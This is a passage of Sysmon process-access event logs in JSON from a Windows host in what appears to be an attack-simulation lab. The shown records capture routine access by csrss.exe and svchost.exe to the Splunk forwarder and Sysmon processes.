{"EventTime":"2020-08-01 05:47:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2765,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:57.510\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-020D-5F25-0000-001069E30400}\r\nTargetProcessId: 4548\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:57.510","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-020D-5F25-0000-001069E30400}","TargetProcessId":"4548","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2766,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:57.510\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:57.510","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2767,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:57.510\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:57.510","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2768,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:57.510\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:57.510","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2769,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:57.510\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:57.510","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2770,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:57.510\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:57.510","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2771,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:57.510\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:57.510","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2772,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:57.510\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:57.510","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2773,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:57.510\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 